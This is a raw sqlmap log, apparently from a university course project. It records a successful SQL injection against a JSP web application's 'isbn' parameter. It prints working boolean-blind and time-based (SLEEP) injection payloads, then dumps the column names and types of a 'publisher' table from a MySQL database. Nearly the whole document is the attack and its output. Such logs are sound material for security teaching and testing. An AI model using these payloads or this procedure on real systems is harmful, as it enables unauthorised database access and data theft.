
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:25:17

[23:25:18] [INFO] resuming back-end DBMS 'mysql' 
[23:25:18] [INFO] testing connection to the target URL
[23:25:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: isbn
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: isbn=9788274775268' AND 4646=4646 AND 'TEwU'='TEwU

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: isbn=9788274775268' AND SLEEP(5) AND 'LTxt'='LTxt
---
[23:25:18] [INFO] the back-end DBMS is MySQL
web application technology: JSP, JSP 2.2
back-end DBMS: MySQL 5
[23:25:18] [INFO] fetching columns for table 'publisher' in database 'sigbjoo_group12'
[23:25:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:25:18] [INFO] retrieved: 
[23:25:18] [INFO] heuristics detected web page charset 'ascii'

[23:25:18] [INFO] retrieved: [23:25:18] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[23:25:18] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[23:25:29] [INFO] retrieved: 
[23:25:30] [INFO] retrieved: 
[23:25:35] [INFO] adjusting time delay to 1 second due to good response times
id
[23:25:42] [INFO] retrieved: 
[23:25:44] [INFO] retrieved: int(10) unsigned
[23:26:51] [INFO] retrieved: 
[23:26:53] [INFO] retrieved: name
[23:27:08] [INFO] retrieved: 
[23:27:10] [INFO] retrieved: varchar(255)
Database: sigbjoo_group12
Table: publisher
[2 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| id     | int(10) unsigned |
| name   | varchar(255)     |
+--------+------------------+

[23:27:53] [INFO] fetched data logged to text files under '/home/others/shomeb/a/andesil/sqlmapproject-sqlmap-f11e15a/output/paris.idi.ntnu.no'

[*] shutting down at 23:27:53

